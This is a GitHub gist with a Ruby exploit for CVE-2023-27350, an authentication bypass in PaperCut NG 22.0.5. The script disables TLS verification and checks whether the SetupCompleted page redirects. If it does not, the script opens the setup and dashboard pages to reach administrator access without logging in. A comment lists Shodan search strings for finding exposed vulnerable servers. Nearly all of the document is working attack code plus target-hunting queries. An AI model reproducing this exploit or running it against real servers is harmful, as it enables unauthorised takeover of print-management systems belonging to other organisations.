Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Created May 10, 2023 19:23
Show Gist options
  • Save komodoooo/43f034a62486bf8051b5075ebf5eac32 to your computer and use it in GitHub Desktop.
Save komodoooo/43f034a62486bf8051b5075ebf5eac32 to your computer and use it in GitHub Desktop.
CVE-2023-27350 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-27350
PaperCut NG 22.0.5 Build 63914 auth bypass exploit
By komodo\n
"""
=begin
Shodan dork to search vulnerable targets:
http.title:"PaperCut Login" http.html:"papercut" http.html:"print"
http.favicon.hash:-626462482
=end
def main(url)
url.delete_suffix!("/") unless url[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
pa=["/app?service=page/SetupCompleted",
"/app?service=page/Dashboard"]
if HTTP.get(url+pa[0], :ssl_context=>@ctx).status == 302
puts "\nNot vulnerable :(\n\n"
else
pa.each do |i|
sus=url+i #yeah, "portability"...
system("xdg-open %s || start %s || open %s"%[sus,sus,sus])
sleep(2)
end
end
end
begin
print("Base URL: ")
main(gets.chomp)
rescue => err
abort(err.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment